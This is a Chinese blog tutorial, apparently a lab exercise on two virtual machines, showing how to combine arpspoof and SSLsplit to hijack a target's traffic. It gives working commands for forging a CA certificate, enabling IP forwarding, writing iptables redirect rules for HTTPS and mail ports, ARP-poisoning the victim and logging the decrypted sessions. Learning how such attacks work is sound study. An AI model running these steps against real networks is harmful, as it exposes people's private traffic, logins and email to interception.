• 利用SSLsplit+arpspoof 实现ARP欺骗劫持流量


    arp欺骗的原理

    参考博客

    讲的很详细,建议大家看看

     

    准备

    一台kali虚拟机,ip 192.168.33.129

    一台win7虚拟机,ip 192.168.33.130

    需要安装arpspoof,没有的话使用命令的时候会提示安装,这时候直接安装就行了

    SSLsplit的功能

    即在中间监听获取网络数据以便获取的有价值的信息实现攻击破坏的目的,即client-mid man-server,此处介绍的sslsplit可以作为mid man监听ssl信息及HTTP信息。http不做介绍仅仅实现代理功能,ssl实现代理的同时要与服务器建立连接,同时伪造证书与客户端建立连接,即双连接,依据获取的client信息再与服务器通信,从而实现明文数据监听。

    所以我们需要先伪造证书

    1. 利用openssl生成证书私钥
    2. openssl genrsa -out ca.key 2048
    3. 利用私钥签名生成证书
    4. openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
    5. 遇到停顿回车就行

    可以看见在我/home/kali的目录下生成了ca.key 私钥文件和ca.crt证书文件

     

    开启路由转发功能

    1. sysctl -w net.ipv4.ip_forward=1
    2. echo 1 > /proc/sys/net/ipv4/ip_forward
    3. 上面两种都行

     开启路由转发,我们才能把劫持到的目标机的流量请求发送给网关,使目标机能上网,不开启的话目标机无法上网,可以达到断网的目的

    设置iptables端口转发规则

    1. iptables -t nat -F
    2. 清空当前表规则
    3. iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080#HTTP
    4. iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443#HTTPS
    5. iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443#MSA
    6. iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443#SMTPS
    7. iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443#IMAPS
    8. iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443#POP3S
    9. 使用下面命令显示刚才配置的规则
    10. iptables -t nat -L #显示所有规则

     

    Arp欺骗 ,截获目标主机的网络流量

    先去看看目标主机的网关

    1. arpspoof -i eth0 -t 目标IP -r 目标主机网关
    2. arpspoof -i eth0 -t 192.168.33.130 -r 192.168.33.2

     

    启动SSLsplit进行攻击

    1. 创建目录
    2. mkdir -p test/logdir
    3. 侦听设定的端口
    4. sslsplit -D -l connect.log -j /home/kali/test -S /home/kali/test/logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
    5. 这里要注意目录

     

    伪造成功后,目标机访问https的网站,会出现安全证书有问题

    因为我这里已经试过了,所以出现的不是显示证书有问题

    正常是会这样

     接受确定继续访问后就会劫持访问,访问信息就会被kali记录在connect.log里面

    我开始是访问的https://www.baidu.com

     可以看见成功进行arp欺骗并用SSLsplit劫持流量信息

    分析一个ARP欺骗的各种玩法博客

  • 相关阅读:
    【计算机网络】Linux 内核网络概述
    MyBatis-plus:简介、入门、插入测试(狂)
    openstack的组成
    SpringBoot教程三自定义Servlet、Filter、Listener在启动时重写Web相关请求处理类
    Android技能树-进程-进程名称
    vue组件间传参以及方法调用总结
    区分Cookie,Session,Token
    Dijkstra算法和Floyd算法求最短路径
    高并发应用实践——限流手段
    BI系统上的报表怎么导出来?附方法步骤
  • 原文地址:https://blog.csdn.net/m0_63253040/article/details/126377822